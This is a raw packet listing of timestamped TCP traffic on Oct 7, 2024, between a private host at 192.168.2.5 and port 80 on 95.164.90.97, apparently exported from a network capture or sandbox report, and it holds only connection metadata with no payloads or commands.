Oct 7, 2024 03:15:42.030343056 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.030358076 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.030375004 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.030390024 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.030411005 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.030440092 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.030442953 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.030489922 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.030494928 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.030524015 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.030540943 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.030556917 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.030580044 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.030591011 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.030613899 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.030628920 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.030642033 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.030680895 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.030684948 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.030713081 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.030730963 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.030746937 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.030764103 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.030777931 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.030802011 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.030810118 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.030829906 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.030860901 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.030860901 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.030913115 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.030913115 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.030946016 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.030967951 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.030982018 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.030998945 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.031017065 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.031042099 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.031050920 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.031083107 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.031088114 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.031097889 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.031116009 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.031133890 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.031150103 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.031163931 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.031184912 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.031199932 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.031219959 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.031233072 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.031253099 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.031270027 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.031286955 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.031301022 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.031320095 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.031337023 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.031352997 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.031366110 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.031404972 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.031414986 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.031447887 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.031465054 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.031481981 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.031497955 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.031513929 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.031532049 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.031547070 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.031564951 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.031580925 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.031596899 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.031627893 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.031635046 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.031667948 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.031692028 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.031699896 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.031714916 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.031732082 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.031759977 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.031765938 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.031780958 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.031797886 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.031816959 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.031832933 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.031850100 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.031864882 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.031894922 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.031898975 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.031913042 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.031930923 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.031943083 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.031965017 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.031982899 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.031997919 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.032018900 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.032031059 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.032056093 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.032066107 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.032080889 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.032100916 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.032125950 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.032135963 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.032157898 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.032170057 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.032186985 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.032205105 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.032223940 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.032238960 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.032267094 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.032274008 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.032286882 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.032308102 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.032327890 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.032340050 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.032354116 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.032373905 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.032387972 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.032406092 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.032423973 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.032438993 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.032455921 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.032470942 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.032525063 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.032552958 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.032588005 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.032589912 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.032623053 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.032625914 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.032655954 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.032661915 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.032697916 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.032716990 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.032732964 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.032742023 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.032764912 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.032768965 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.032798052 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.032798052 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.032815933 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.032830000 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.032850027 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.032862902 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.032896996 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.032931089 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.032932997 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.032964945 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.032980919 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.032999039 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.033023119 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.033032894 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.033057928 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.033068895 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.033088923 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.033124924 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.119713068 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.119740963 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.119766951 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.119785070 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.119801998 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.119827032 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.119842052 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.119858027 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.119874001 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.119891882 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.119954109 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.119955063 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.119955063 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.119955063 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.119955063 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.119976997 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.119992018 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120007038 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120022058 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120028019 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.120035887 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120053053 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.120063066 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120090008 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120105028 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.120105028 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120115042 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.120131969 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120146036 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120157957 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.120161057 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120183945 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120199919 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120213032 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.120213032 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.120214939 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120239019 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120254040 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120261908 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.120280027 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120296955 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120299101 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.120311975 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120328903 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120336056 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.120347023 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120362997 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120388985 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120403051 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120408058 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.120408058 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.120419025 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120430946 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.120444059 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120451927 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.120460987 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120507956 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.120529890 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120547056 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.120548010 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120572090 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120580912 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.120588064 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120603085 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.120604992 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120630980 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120632887 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.120646000 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120667934 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.120670080 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120685101 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120699883 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120706081 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.120716095 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120747089 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.120757103 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120770931 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120771885 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.120788097 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120803118 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120810032 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.120817900 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120832920 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.120834112 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120851040 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120881081 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.120891094 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.120906115 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120920897 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120935917 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120950937 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120959044 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.120965958 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.120982885 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.121005058 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.121031046 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.121037960 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.121058941 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.121076107 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.121088982 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.121107101 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.121124029 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.121128082 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.121145010 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.121164083 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.121164083 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.121201038 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.121207952 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.121227980 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.121237040 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.121248007 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.121268988 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.121274948 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.121289968 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.121318102 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.121341944 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.121367931 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.121409893 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.121424913 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.121454000 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.121468067 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.121494055 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.121507883 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.121545076 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.121546030 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.121578932 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.121601105 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.121614933 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.121630907 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.121646881 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.121664047 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.121697903 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.121697903 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.121731043 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.121750116 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.121763945 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.121783972 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.121797085 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.121815920 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.121849060 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.121851921 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.121884108 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.121903896 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.121922016 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.121937037 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.121954918 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.121975899 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.121989965 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.122009039 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.122024059 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.122041941 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.122076035 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.122078896 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.122112989 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.122133970 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.122145891 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.122169018 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.122179985 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.122195959 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.122214079 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.122231007 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.122247934 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.122262955 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.122278929 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.122303009 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.122312069 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.122347116 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.122359991 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.122380018 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.122414112 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.122421026 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.122421980 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.122436047 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.122446060 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.122462034 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.122478008 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.122493982 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.122510910 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.122522116 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.122546911 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.122569084 CEST	49782	80	192.168.2.5	95.164.90.97
